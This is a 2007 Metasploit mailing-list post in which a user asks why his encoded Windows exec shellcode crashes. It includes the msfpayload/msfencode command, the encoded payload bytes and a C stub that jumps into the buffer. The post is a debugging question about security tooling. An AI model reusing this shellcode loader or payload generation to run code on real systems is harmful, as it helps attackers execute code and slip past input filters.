Metasploit mailing list archives
Using encoded payload in executable
From: c0r31mp4ct at gmail.com (C0r3 1mp4ct)
Date: Thu, 7 Jun 2007 10:43:17 +0200
Hi List!
I tried to use the output of "./msfpayload -e windows/x86/exec CMD=cmd
EXITFUNC=process R | ./msfencode -e x86/avoid_utf8_tolower c" in a C
program that executes it by simply transferring the control to the
string buffer containing the encoded payload. The payload is generated
on Fedora Core 6.
Execution environment:
OS: XP Professional SP2 fully patched and DEP turned off
Compiler: LCC win32
The result is:
"Access violation when reading [2F38247F]"
Could someone help me?
What i am doing wrong?
Here is the program i compiled and tried to run:
#include <stdio.h>
#include <string.h>
unsigned char buf[] =
"\x6a\x1e\x6b\x3c\x24\x0b\x60\x03\x0c\x24\x6a\x11\x03\x0c\x24"
"\x6a\x04\x68\x25\x7d\x30\x6d\x5f\x29\x39\x03\x0c\x24\x68\x61"
"\x6e\x7c\x28\x5f\x29\x39\x03\x0c\x24\x68\x34\x12\x20\x04\x5f"
"\x01\x39\x03\x0c\x24\x68\x02\x34\x6c\x7a\x5f\x29\x39\x03\x0c"
"\x24\x68\x27\x04\x78\x5b\x5f\x01\x39\x03\x0c\x24\x68\x02\x0f"
"\x72\x30\x5f\x29\x39\x03\x0c\x24\x68\x7f\x33\x7d\x29\x5f\x29"
"\x39\x03\x0c\x24\x68\x78\x1b\x65\x60\x5f\x01\x39\x03\x0c\x24"
"\x68\x7d\x12\x5e\x67\x5f\x01\x39\x03\x0c\x24\x68\x06\x63\x60"
"\x02\x5f\x01\x39\x03\x0c\x24\x68\x0f\x5e\x3e\x12\x5f\x29\x39"
"\x03\x0c\x24\x68\x03\x33\x18\x01\x5f\x01\x39\x03\x0c\x24\x68"
"\x67\x73\x1e\x5e\x5f\x01\x39\x03\x0c\x24\x68\x17\x2c\x16\x16"
"\x5f\x29\x39\x03\x0c\x24\x68\x66\x05\x1c\x16\x5f\x01\x39\x03"
"\x0c\x24\x68\x11\x13\x23\x2a\x5f\x29\x39\x03\x0c\x24\x68\x7f"
"\x3f\x78\x37\x5f\x29\x39\x03\x0c\x24\x68\x7e\x17\x31\x1e\x5f"
"\x01\x39\x03\x0c\x24\x68\x02\x63\x04\x22\x5f\x01\x39\x03\x0c"
"\x24\x68\x7f\x24\x38\x2f\x5f\x01\x39\x03\x0c\x24\x68\x2f\x35"
"\x07\x6b\x5f\x01\x39\x03\x0c\x24\x68\x0f\x08\x1f\x67\x5f\x01"
"\x39\x03\x0c\x24\x68\x1a\x31\x6d\x28\x5f\x01\x39\x03\x0c\x24"
"\x68\x03\x2a\x7e\x1c\x5f\x01\x39\x03\x0c\x24\x68\x5d\x5c\x10"
"\x2c\x5f\x01\x39\x03\x0c\x24\x68\x75\x61\x76\x63\x5f\x01\x39"
"\x03\x0c\x24\x68\x2c\x77\x7f\x18\x5f\x01\x39\x03\x0c\x24\x68"
"\x0d\x19\x0d\x21\x5f\x29\x39\x03\x0c\x24\x68\x19\x07\x04\x20"
"\x5f\x29\x39\x03\x0c\x24\x68\x2d\x6d\x18\x30\x5f\x29\x39\x03"
"\x0c\x24\x21\x66\x75\x6d\x61\x6e\x07\x6e\x08\x79\x5c\x01\x7a"
"\x35\x5b\x06\x28\x14\x13\x04\x22\x10\x5d\x7a\x0a\x68\x08\x2b"
"\x76\x16\x5b\x39\x2f\x72\x62\x0d\x01\x5e\x6a\x0b\x10\x20\x2a"
"\x07\x38\x21\x0c\x03\x0e\x72\x6d\x01\x3b\x2d\x01\x7d\x25\x07"
"\x2f\x75\x70\x2f\x24\x15\x0a\x5c\x03\x39\x6d\x72\x2b\x06\x02"
"\x60\x5b\x0f\x77\x3c\x1e\x35\x5c\x11\x29\x20\x31\x04\x6c\x09"
"\x02\x7c\x1e\x40\x05\x5f\x7a\x67\x63\x0e\x40\x3c\x09\x77\x6c"
"\x10\x3c\x21\x7f\x72\x1b\x70\x0c\x09\x7c\x74\x68\x20\x37\x6d"
"\x18\x30";
int main ( int argc, char * argv[] ){
void (* function)();
*(long *)&function = (long)&buf;
function();
}
Any help would be appreciated!
Thanks!
Regards:
c0r31mp4ct
Current thread:
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 11)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)